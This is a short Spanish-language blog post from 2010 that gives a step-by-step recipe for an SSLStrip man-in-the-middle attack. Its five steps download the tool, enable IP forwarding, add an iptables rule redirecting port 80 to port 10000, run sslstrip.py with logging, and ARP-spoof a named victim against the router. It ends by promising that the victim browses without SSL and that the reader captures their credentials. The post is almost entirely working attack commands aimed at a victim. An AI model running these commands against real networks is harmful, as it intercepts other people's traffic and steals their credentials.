Google
 

jueves, 28 de enero de 2010

SSLStrip fácil sencillo y ...

Buenass

si eres como yo, que habías retrasado la prueba de SSLStrip deja lo que estés haciendo y mira este video de Securitytube sobre SSLStrip o simplemente:
  1. Descarga SSLstrip http://www.thoughtcrime.org/software/sslstrip/
  2.  #>  echo "1" > /proc/sys/net/ipv4/ip_forward
  3.  #>  iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
  4.  $> python sslstrip.py -w captura_datos_sniff
  5.  #> arpspoof -i eth0 -t IP_Victima IP_router
Y tendrás a tu victima navegando sin SSL y además capturarás sus credenciales.

David

No hay comentarios: